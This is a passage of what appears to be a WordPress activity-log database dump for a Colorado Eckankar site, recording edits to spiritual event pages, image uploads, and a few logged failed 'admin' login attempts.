16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234742,39864,'_message_key','post_updated'),(234743,39864,'_user_id','2'),(234744,39864,'_user_login','S8zhaBda'),(234745,39864,'_user_email','nada@zipnadanot.org'),(234746,39864,'_server_remote_addr','76.130.120.x'),(234747,39864,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269260&action=edit'),(234748,39865,'post_id','269260'),(234749,39865,'post_type','mec-events'),(234750,39865,'post_title','Our Spiritual Wake-up Calls'),(234751,39865,'_message_key','post_updated'),(234752,39865,'_user_id','2'),(234753,39865,'_user_login','S8zhaBda'),(234754,39865,'_user_email','nada@zipnadanot.org'),(234755,39865,'_server_remote_addr','76.130.120.x'),(234756,39865,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269260&action=edit'),(234757,39866,'post_id','269260'),(234758,39866,'post_type','mec-events'),(234759,39866,'post_title','Our Spiritual Wake-up Calls'),(234760,39866,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234761,39866,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong><i class=\"fa-solid fa-video\" style=\"color: #bc9716;\"></i>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234762,39866,'_message_key','post_updated'),(234763,39866,'_user_id','2'),(234764,39866,'_user_login','S8zhaBda'),(234765,39866,'_user_email','nada@zipnadanot.org'),(234766,39866,'_server_remote_addr','76.130.120.x'),(234767,39866,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269260&action=edit'),(234768,39867,'post_id','269260'),(234769,39867,'post_type','mec-events'),(234770,39867,'post_title','Our Spiritual Wake-up Calls'),(234771,39867,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong><i class=\"fa-solid fa-video\" style=\"color: #bc9716;\"></i>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234772,39867,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #cf7119;\">Wake Up And Step Into A Greater Room.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 16pt;\"><strong>People of all faiths are warmly invited to the ECK Light and Sound Service.<br>\r\nEach service focuses on spiritual principles at work in our lives.</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU Chant, and be able to speak with other like-hearted spiritual seekers. It is an uplifting event where you can reflect on and connect with the Light and Sound, the divine aspect within yourself.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">The ECK Light and Sound Service is followed by light refreshments and the opportunity to share informally.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join others seeking to bring more insight and divine love into their lives at this special celebration of the Light and Sound of God.</span></p>\r\n<ul class=\"\">\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Discover spiritual tools to meet life’s challenges</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Awaken to the divine guidance always within you</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Open your heart to give and receive more divine love</span></li>\r\n	<li><span style=\"color: #666666; font-size: 14pt;\">Experience how the Light and Sound of God can help you lead a happier life</span></li>\r\n</ul>\r\n<p class=\"\"><span style=\"color: #666666;\"><span style=\"font-size: 14pt;\">You are invited to come and experience spiritual growth and fellowship as you explore what could be your next spiritual step.<br>\r\n</span></span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt; color: #1d5791;\"><strong>For those who cannot attend in person, you are welcome to attend online.<br>\r\nPlease register to get the Zoom login information. Hope to see you there!</strong></span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234775,39867,'_user_login','S8zhaBda'),(234774,39867,'_user_id','2'),(234773,39867,'_message_key','post_updated'),(234797,39870,'_user_id','2'),(234796,39870,'_message_key','post_duplicated'),(234795,39870,'duplicated_post_id','267696'),(234794,39870,'duplicated_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(234793,39870,'new_post_id','269262'),(234792,39870,'new_post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(234776,39867,'_user_email','nada@zipnadanot.org'),(234777,39867,'_server_remote_addr','76.130.120.x'),(234778,39867,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269260&action=edit'),(234779,39868,'failed_username','admin'),(234780,39868,'server_http_user_agent','Mozilla/5.0'),(234781,39868,'_message_key','user_unknown_login_failed'),(234782,39868,'_server_remote_addr','66.55.65.x'),(234783,39869,'post_id','269262'),(234784,39869,'post_type','mec-events'),(234785,39869,'post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(234786,39869,'_message_key','post_updated'),(234787,39869,'_user_id','2'),(234788,39869,'_user_login','S8zhaBda'),(234789,39869,'_user_email','nada@zipnadanot.org'),(234790,39869,'_server_remote_addr','76.130.120.x'),(234791,39869,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(234798,39870,'_user_login','S8zhaBda'),(234799,39870,'_user_email','nada@zipnadanot.org'),(234800,39870,'_server_remote_addr','76.130.120.x'),(234801,39870,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a8a3e8b561&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F26%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1'),(234804,39871,'_message_key','user_unknown_login_failed'),(234802,39871,'failed_username','admin'),(234803,39871,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(234814,39873,'post_title','The Power of Grace'),(234813,39873,'post_type','mec-events'),(234812,39873,'post_id','269262'),(234810,39872,'_server_remote_addr','31.129.69.x'),(234811,39872,'_server_http_referer','https://staircleaning.com/wp-login.php'),(234805,39871,'_server_remote_addr','31.129.69.x'),(234809,39872,'_message_key','user_unknown_login_failed'),(234806,39871,'_server_http_referer','https://staircleaning.com/wp-login.php'),(234807,39872,'failed_username','admin'),(234808,39872,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),(234815,39873,'post_meta_added','78'),(234816,39873,'_message_key','post_updated'),(234817,39873,'_user_id','2'),(234818,39873,'_user_login','S8zhaBda'),(234819,39873,'_user_email','nada@zipnadanot.org'),(234820,39873,'_server_remote_addr','76.130.120.x'),(234821,39873,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269262'),(234822,39874,'post_id','269262'),(234823,39874,'post_type','mec-events'),(234824,39874,'post_title','The Power of Grace'),(234825,39874,'post_meta_added','78'),(234826,39874,'_message_key','post_updated'),(234827,39874,'_user_id','2'),(234828,39874,'_user_login','S8zhaBda'),(234829,39874,'_user_email','nada@zipnadanot.org'),(234830,39874,'_server_remote_addr','76.130.120.x'),(234831,39874,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269262'),(234832,39875,'post_id','269262'),(234833,39875,'post_type','mec-events'),(234834,39875,'post_title','The Power of Grace'),(234835,39875,'post_meta_added','78'),(234836,39875,'_message_key','post_updated'),(234837,39875,'_user_id','2'),(234838,39875,'_user_login','S8zhaBda'),(234839,39875,'_user_email','nada@zipnadanot.org'),(234840,39875,'_server_remote_addr','76.130.120.x'),(234841,39875,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269262'),(234842,39876,'post_id','269262'),(234843,39876,'post_type','mec-events'),(234844,39876,'post_title','The Power of Grace'),(234845,39876,'post_meta_added','78'),(234846,39876,'_message_key','post_updated'),(234847,39876,'_user_id','2'),(234848,39876,'_user_login','S8zhaBda'),(234849,39876,'_user_email','nada@zipnadanot.org'),(234850,39876,'_server_remote_addr','76.130.120.x'),(234851,39876,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269262'),(234852,39877,'post_type','attachment'),(234853,39877,'attachment_id','269263'),(234854,39877,'attachment_title','waterfall-illus'),(234855,39877,'attachment_filename','waterfall-illus.jpg'),(234856,39877,'attachment_mime','image/jpeg'),(234857,39877,'attachment_filesize','100670'),(234858,39877,'attachment_parent_id','269262'),(234859,39877,'attachment_parent_title','The Power of Grace'),(234860,39877,'attachment_parent_post_type','mec-events'),(234861,39877,'_message_key','attachment_created'),(234862,39877,'_user_id','2'),(234863,39877,'_user_login','S8zhaBda'),(234864,39877,'_user_email','nada@zipnadanot.org'),(234865,39877,'_server_remote_addr','76.130.120.x'),(234866,39877,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269262'),(234867,39878,'post_id','269262'),(234868,39878,'post_type','mec-events'),(234869,39878,'post_title','The Power of Grace'),(234870,39878,'post_prev_post_name',''),(234871,39878,'post_new_post_name','the-power-of-grace-2'),(234872,39878,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">A Secret to Spiritual Living<br>\n</span></strong></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Step confidently into a larger room, a higher consciousness, where the grace of acceptance, understanding, healing, and happiness can be found. Discover spiritual secrets to help you realize the profound reality of God’s love in your life.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">*When was the last time you recognized even a small miracle in your life?</span><br>\n<span style=\"font-size: 14pt;\">*Discover spiritual secrets to help you realize the profound reality of God’s love in your everyday life.</span><br>\n<span style=\"font-size: 14pt;\">*Explore how everything that happens to you is truly is for your highest spiritual benefit.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Come share your insights and explore how gaining an understanding of The Power of God’s Grace can help you handle challenges in a better way, develop the quality of divine love, and become more godlike.</span></p>\n<br>\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/296647792/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(234873,39878,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">A Secret to Spiritual Living<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Step confidently into a larger room, a higher consciousness, where the grace of acceptance, understanding, healing, and happiness can be found. Discover spiritual secrets to help you realize the profound reality of God’s love in your life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">*When was the last time you recognized even a small miracle in your life?</span><br>\r\n<span style=\"font-size: 14pt;\">*Discover spiritual secrets to help you realize the profound reality of God’s love in your everyday life.</span><br>\r\n<span style=\"font-size: 14pt;\">*Explore how everything that happens to you is truly is for your highest spiritual benefit.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come share your insights and explore how gaining an understanding of The Power of God’s Grace can help you handle challenges in a better way, develop the quality of divine love, and become more godlike.</span></p>\r\n<br>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/296647792/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234874,39878,'post_prev_post_status','draft'),(234875,39878,'post_new_post_status','publish'),(234876,39878,'post_prev_post_date','2023-10-25 14:23:38'),(234877,39878,'post_new_post_date','2023-10-25 14:24:30'),(234878,39878,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(234879,39878,'post_new_post_date_gmt','2023-10-25 20:24:30'),(234880,39878,'post_new_thumb_id','269263'),(234881,39878,'post_new_thumb_title','waterfall-illus'),(234882,39878,'_message_key','post_updated'),(234883,39878,'_user_id','2'),(234884,39878,'_user_login','S8zhaBda'),(234885,39878,'_user_email','nada@zipnadanot.org'),(234886,39878,'_server_remote_addr','76.130.120.x'),(234887,39878,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269262'),(234888,39879,'post_type','attachment'),(234889,39879,'attachment_id','269263'),(234890,39879,'attachment_title','waterfall-illus'),(234891,39879,'attachment_filename','waterfall-illus.jpg'),(234892,39879,'attachment_mime','image/jpeg'),(234893,39879,'_message_key','attachment_deleted'),(234894,39879,'_user_id','2'),(234895,39879,'_user_login','S8zhaBda'),(234896,39879,'_user_email','nada@zipnadanot.org'),(234897,39879,'_server_remote_addr','76.130.120.x'),(234898,39879,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269262&action=edit'),(234899,39880,'post_type','attachment'),(234900,39880,'attachment_id','269264'),(234901,39880,'attachment_title','waterfall-illus-2'),(234902,39880,'attachment_filename','waterfall-illus-2.jpg'),(234903,39880,'attachment_mime','image/jpeg'),(234904,39880,'attachment_filesize','158705'),(234905,39880,'attachment_parent_id','269262'),(234906,39880,'attachment_parent_title','The Power of Grace'),(234907,39880,'attachment_parent_post_type','mec-events'),(234908,39880,'_message_key','attachment_created'),(234909,39880,'_user_id','2'),(234910,39880,'_user_login','S8zhaBda'),(234911,39880,'_user_email','nada@zipnadanot.org'),(234912,39880,'_server_remote_addr','76.130.120.x'),(234913,39880,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269262&action=edit'),(234914,39881,'post_id','269262'),(234915,39881,'post_type','mec-events'),(234916,39881,'post_title','The Power of Grace'),(234917,39881,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">A Secret to Spiritual Living<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Step confidently into a larger room, a higher consciousness, where the grace of acceptance, understanding, healing, and happiness can be found. Discover spiritual secrets to help you realize the profound reality of God’s love in your life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">*When was the last time you recognized even a small miracle in your life?</span><br>\r\n<span style=\"font-size: 14pt;\">*Discover spiritual secrets to help you realize the profound reality of God’s love in your everyday life.</span><br>\r\n<span style=\"font-size: 14pt;\">*Explore how everything that happens to you is truly is for your highest spiritual benefit.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come share your insights and explore how gaining an understanding of The Power of God’s Grace can help you handle challenges in a better way, develop the quality of divine love, and become more godlike.</span></p>\r\n<br>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/296647792/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(234918,39881,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">A Secret to Spiritual Living<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Step confidently into a larger room, a higher consciousness, where the grace of acceptance, understanding, healing, and happiness can be found. Discover spiritual secrets to help you realize the profound reality of God’s love in your life.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">*When was the last time you recognized even a small miracle in your life?</span><br>\r\n<span style=\"font-size: 14pt;\">*Discover spiritual secrets to help you realize the profound reality of God’s love in your everyday life.</span><br>\r\n<span style=\"font-size: 14pt;\">*Explore how everything that happens to you is truly is for your highest spiritual benefit.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Come share your insights and explore how gaining an understanding of The Power of God’s Grace can help you handle challenges in a better way, develop the quality of divine love, and become more godlike.</span></p>\r\n<p>&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/296647792/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own 